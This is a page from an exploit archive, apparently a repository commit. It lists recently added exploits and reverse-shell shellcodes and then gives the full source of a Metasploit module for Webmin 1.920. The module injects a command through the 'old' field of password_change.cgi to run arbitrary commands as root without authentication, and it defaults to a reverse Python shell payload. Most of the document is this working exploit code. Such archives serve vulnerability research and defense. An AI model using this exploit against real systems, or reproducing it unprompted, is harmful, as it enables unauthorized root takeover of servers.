a32e028b88
17 changes to exploits/shellcodes VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow Linux - Use-After-Free Reads in show_numa_stats() WebKit - UXSS via XSLT and Nested Document Replacements Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit) Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal (Metasploit) UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion osTicket 1.12 - Persistent Cross-Site Scripting via File Upload osTicket 1.12 - Formula Injection osTicket 1.12 - Persistent Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
125 lines
No EOL
3.7 KiB
Ruby
Executable file
125 lines
No EOL
3.7 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Webmin 1.920 Unauthenticated RCE',
|
|
'Description' => %q(
|
|
This module exploits an arbitrary command execution vulnerability in Webmin
|
|
1.920 and prior versions. If the password change module is turned on, the unathenticated user
|
|
can execute arbitrary commands with root privileges.
|
|
|
|
/////// This 0day has been published at DEFCON-AppSec Village. ///////
|
|
|
|
),
|
|
'Author' => [
|
|
'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE', '2019-'],
|
|
['URL', 'https://www.pentest.com.tr']
|
|
],
|
|
'Privileged' => true,
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true,
|
|
'Space' => 512,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd'
|
|
}
|
|
},
|
|
'DefaultOptions' =>
|
|
{
|
|
'RPORT' => 10000,
|
|
'SSL' => false,
|
|
'PAYLOAD' => 'cmd/unix/reverse_python'
|
|
},
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [['Webmin <= 1.910', {}]],
|
|
'DisclosureDate' => 'May 16 2019',
|
|
'DefaultTarget' => 0)
|
|
)
|
|
register_options [
|
|
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
|
|
]
|
|
end
|
|
|
|
def peer
|
|
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
|
|
end
|
|
##
|
|
# Target and input verification
|
|
##
|
|
def check
|
|
# check passwd change priv
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, "password_change.cgi"),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/session_login.cgi"
|
|
},
|
|
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1"
|
|
})
|
|
|
|
if res && res.code == 200 && res.body =~ /Failed/
|
|
res = send_request_cgi(
|
|
{
|
|
'method' => 'POST',
|
|
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/session_login.cgi"
|
|
},
|
|
'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"
|
|
})
|
|
|
|
if res && res.code == 200 && res.body =~ /password_change.cgi/
|
|
return CheckCode::Vulnerable
|
|
else
|
|
return CheckCode::Safe
|
|
end
|
|
else
|
|
return CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
##
|
|
# Exploiting phase
|
|
##
|
|
def exploit
|
|
|
|
unless Exploit::CheckCode::Vulnerable == check
|
|
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
|
|
end
|
|
|
|
command = payload.encoded
|
|
print_status("Attempting to execute the payload...")
|
|
handler
|
|
res = send_request_cgi(
|
|
{
|
|
'method' => 'POST',
|
|
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/session_login.cgi"
|
|
},
|
|
'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
|
|
})
|
|
|
|
end
|
|
end |